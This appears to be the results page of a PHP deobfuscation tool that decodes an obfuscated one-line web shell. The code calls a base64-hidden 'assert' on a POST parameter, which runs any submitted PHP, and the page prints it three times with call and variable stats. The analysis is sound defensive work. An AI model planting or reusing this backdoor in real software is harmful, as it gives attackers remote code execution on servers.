Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $x=base64_decode("YXNzZXJ0");$x($_POST['c']);?> ..

Decoded Output download

<?php $x=base64_decode("YXNzZXJ0");$x($_POST['c']);?> 

Did this file decode correctly?

Original Code

<?php $x=base64_decode("YXNzZXJ0");$x($_POST['c']);?>

Function Calls

assert 1
base64_decode 1

Variables

$x assert

Stats

MD5 42e293de72cd4c1113480a20c7092488
Eval Count 0
Decode Time 93 ms